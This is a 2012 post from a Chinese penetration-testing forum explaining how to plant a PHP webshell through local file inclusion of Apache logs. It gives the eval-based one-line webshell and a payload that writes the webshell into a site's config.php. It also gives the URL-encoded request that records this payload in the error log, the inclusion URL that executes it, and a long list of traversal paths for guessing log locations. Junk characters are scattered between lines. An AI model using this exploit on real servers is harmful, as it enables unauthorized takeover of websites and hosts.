中国网络渗透测试联盟
标题:
php包含apache日志写马
[打印本页]
作者:
admin
时间:
2012-9-15 14:27
标题:
php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
: q: f3 z$ H8 @$ }
. L2 }. S" _ X1 n- H
比如还是这句一句话木马
' Q5 W$ E @: `" r; Y& A& E
<?eval($_POST[cmd]);?>
# j3 X4 ?1 ~1 @1 z4 B5 i
( g9 w1 j$ j* M6 Z9 r# k
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,
4 M P" C$ J3 a! d4 D6 g
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
1 [& k+ l+ i+ S2 B; m, L
; c& O$ ~7 S, H1 P1 n$ |
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
" C$ E5 d4 c5 v3 |( {! `
fclose($fp);?> //在config.php里写入一句木马语句
7 {6 ?% ~# w+ n! k( W% [' @
0 F5 c1 _9 s& O
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
. e; K! |" D D8 m# a
转换为
( l$ R5 ^- c7 N' X
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
# Y/ ]0 }* V, n8 I! M( u! a1 ?
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
/ _5 U+ A' p: t" H
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
9 D2 G9 i7 Z1 P, e7 a; `
fclose%28%24fp%29%3B%3F%3E
x7 G5 a1 a1 `
我们提交
! n) q# ]5 ]; [' N" G3 v) @# G N, @
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
5 O* d G a* a3 E( T9 ?
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
0 p* T. |1 B1 O# B B) y8 q
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
. F$ r) R2 r0 O& n) [. r5 L
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
1 h, `% G. O- X( @7 z2 X, I& w
( [/ d; H i! F ]8 m6 ^. `; `
这样就错误日志里就记录下了这行写入webshell的代码。
/ h- `3 H8 T1 h5 Y2 A; Q; @
我们再来包含日志,提交
5 j: n% i. p$ O1 Y! f1 r
http://xxx.com/z.php?zizzy=/home
... /logs/www-error_log
# S. g6 K+ `6 V5 n7 I+ A
. o, \6 \* F( ]8 `% ^$ h: ~% I
这样webshell就写入成功了,config.php里就写入一句木马语句
* h+ R+ i5 }( T* s2 w
OK.
2 p- y& Z+ I, B: V
http://www.xxx.com/forum/config.php
这个就成了我们的webshell
" L) s3 k+ d/ h, _
直接用lanker的客户端一连,主机就是你的了。
4 H9 k0 u( T6 e/ S2 X& x/ g" y
: w) [9 q7 W" S$ X
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
( |1 X, E0 U' v" K* t, }+ T+ |
- Q* n# S: @: X
其他的日志路径,你可以去猜,也可以参照这里。
" n" o* P! }9 ]( B1 D
../../../../../../../../../../var/log/httpd/access_log
( k0 n l! I) \1 n' @) A- L
../../../../../../../../../../var/log/httpd/error_log
- @5 m; P* T( n! j5 |/ I% n
../apache/logs/error.log
2 t* G/ i2 |( ?: Y, C
../apache/logs/access.log
) ?. B% E- G0 ~! ^# z
../../apache/logs/error.log
; f9 J9 l! ]9 Q$ i0 e' X) a C
../../apache/logs/access.log
2 y, k3 g0 D' C0 K9 j1 J! ]+ a1 s
../../../apache/logs/error.log
. C$ `1 i5 h: ^6 G6 B; T, ]
../../../apache/logs/access.log
$ k. c& z) a. C1 b" c& o, i
../../../../../../../../../../etc/httpd/logs/acces_log
* }; ?+ q; T: U$ C+ ~
../../../../../../../../../../etc/httpd/logs/acces.log
9 h1 M* {( C. n9 i/ k P
../../../../../../../../../../etc/httpd/logs/error_log
( G& \' i( ?# F: Q6 t/ f7 V# U, J
../../../../../../../../../../etc/httpd/logs/error.log
D& A" U8 ^" U4 d0 [# E
../../../../../../../../../../var/www/logs/access_log
0 `4 J; h- {8 s( k B! ~
../../../../../../../../../../var/www/logs/access.log
- c& x/ J) m) B ?/ `& |: A; o1 q
../../../../../../../../../../usr/local/apache/logs/access_log
8 z+ C8 U' ^* m
../../../../../../../../../../usr/local/apache/logs/access.log
7 R& T) s/ v! }4 t2 F
../../../../../../../../../../var/log/apache/access_log
8 s: }0 C$ M3 Z
../../../../../../../../../../var/log/apache/access.log
+ z6 ?2 m" k1 }, J) @$ Q
../../../../../../../../../../var/log/access_log
: W" [# W$ {1 r* @, q* w
../../../../../../../../../../var/www/logs/error_log
% E$ q4 f9 ^8 v- X! t, ~
../../../../../../../../../../var/www/logs/error.log
8 H% r' F* S" [" F% c m
../../../../../../../../../../usr/local/apache/logs/error_log
0 c9 x1 [2 h7 S* i1 g3 b3 q
../../../../../../../../../../usr/local/apache/logs/error.log
& H' P' p4 K6 c' i& k7 K
../../../../../../../../../../var/log/apache/error_log
5 o9 X4 x: |0 I. E
../../../../../../../../../../var/log/apache/error.log
0 @; _; T7 Y8 i) M7 z1 L7 Y
../../../../../../../../../../var/log/access_log
* ?, X3 o" a- e
../../../../../../../../../../var/log/error_log
4 N$ b# x U3 y. f& R
/var/log/httpd/access_log
$ D" O3 u0 s; @& Q. V$ u+ P4 J
/var/log/httpd/error_log
" q7 b/ l; q- X' P
../apache/logs/error.log
: x7 u! X$ W; a7 @ F
../apache/logs/access.log
/ R1 p4 Y" h/ c, h2 h/ ]7 u
../../apache/logs/error.log
0 G1 Q& b, U2 M; q0 z& H" {4 n1 S$ G# M
../../apache/logs/access.log
+ }" c0 W5 V8 g; j
../../../apache/logs/error.log
/ B- ~% k8 C a* M( J [5 g6 d7 r
../../../apache/logs/access.log
9 Y$ s9 v6 G: z+ o
/etc/httpd/logs/acces_log
2 s, |" f' }2 d; I- f2 q
/etc/httpd/logs/acces.log
0 S) o( \7 o8 S: X. X7 ~1 y
/etc/httpd/logs/error_log
2 ^& I( H7 X) t3 h; y9 X0 S% B
/etc/httpd/logs/error.log
2 r6 c' l8 }( f5 y9 u
/var/www/logs/access_log
% h8 A/ a; ]8 `' @, }* M! H ~
/var/www/logs/access.log
' m b i' A, _- p9 C( a
/usr/local/apache/logs/access_log
% r E/ t; C- X! d q5 R" T, H
/usr/local/apache/logs/access.log
0 t7 x' b9 S* r2 @
/var/log/apache/access_log
: m8 i0 m" o9 \& b' k
/var/log/apache/access.log
0 K! ]9 C4 |. Y* d" `$ K' b7 k
/var/log/access_log
n2 F* [ Q; z# F3 O
/var/www/logs/error_log
! w- ?0 r0 Q! |; d B4 G! B# o
/var/www/logs/error.log
2 g, F8 K$ Z. z) ?7 H
/usr/local/apache/logs/error_log
1 t) c2 H; z i8 N8 B
/usr/local/apache/logs/error.log
1 U8 Y8 Z" B: Q4 \& B* a
/var/log/apache/error_log
1 N- J7 X7 G5 t9 I
/var/log/apache/error.log
4 `; n9 h/ b* K c/ F
/var/log/access_log
8 s; a6 M: n( G
/var/log/error_log
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2